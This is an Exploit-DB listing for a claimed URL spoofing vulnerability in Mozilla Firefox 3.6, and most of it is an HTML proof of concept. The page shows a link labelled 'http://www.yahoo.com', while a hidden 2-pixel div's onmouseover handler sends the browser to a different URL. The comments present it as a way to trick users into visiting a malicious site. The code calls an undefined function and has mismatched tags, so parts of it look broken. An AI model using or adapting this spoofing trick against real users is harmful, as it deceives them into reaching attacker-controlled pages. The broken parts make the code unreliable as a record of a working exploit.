Mozilla Firefox 3.6 - URL Spoofing Vulnerability

2010-02-24T00:00:00
ID EDB-ID:11561
Type exploitdb
Reporter Unknown
Modified 2010-02-24T00:00:00

Description

Mozilla Firefox v3.6 URL Spoofing Vulnerability. Local exploits for multiple platform

                                        
                                            # Tested on: Windows XP SP2/3
# Code : 
# You can trick a user into accessing a malicious website by using 
the following exploit
# The first link would be the malicious one.


<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.youtube.com/watch?v=oHg5S
JYRHA0';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px"></div>

<br>
<a href="http://www.yahoo.com" onclick="updatebox(event)"><font
style="font-family:arial;font-
size:32px">http://www.yahoo.com</font></a><br>

</div>
</body>
</html>